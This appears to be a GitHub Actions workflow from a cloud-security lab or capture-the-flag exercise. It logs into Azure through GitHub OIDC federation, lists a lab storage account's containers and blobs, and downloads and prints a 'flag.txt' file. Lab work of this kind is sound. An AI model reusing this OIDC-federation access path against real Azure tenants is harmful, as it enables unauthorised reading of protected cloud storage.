name: TEST OICD
on: [push]

jobs:
    test:
        permissions:
            id-token: write # Require write permission to Fetch an OIDC token.

        runs-on: ubuntu-latest
        steps:
            - name: Azure CLI Login
              uses: azure/login@v2
              with:
                  client-id: ${{ secrets.AZURE_CLIENT_ID }}
                  tenant-id: ${{ secrets.AZURE_TENANT_ID }}
                  subscription-id: ${{ secrets.AZURE_SUBSCRIPTION_ID }}

            - name: Azure CLI script
              uses: azure/cli@v2
              with:
                  azcliversion: latest
                  inlineScript: |
                      echo "Check container"
                      az storage container list --account-name iamazurelab3d090e49d --auth-mode login

                      echo "Check blob"
                      az storage blob list --account-name iamazurelab3d090e49d --auth-mode login -c flag

                      echo "Get flag"
                      az storage blob download --account-name iamazurelab3d090e49d --auth-mode login -c flag -n flag.txt -f ./flag.txt
                      cat ./flag.txt 
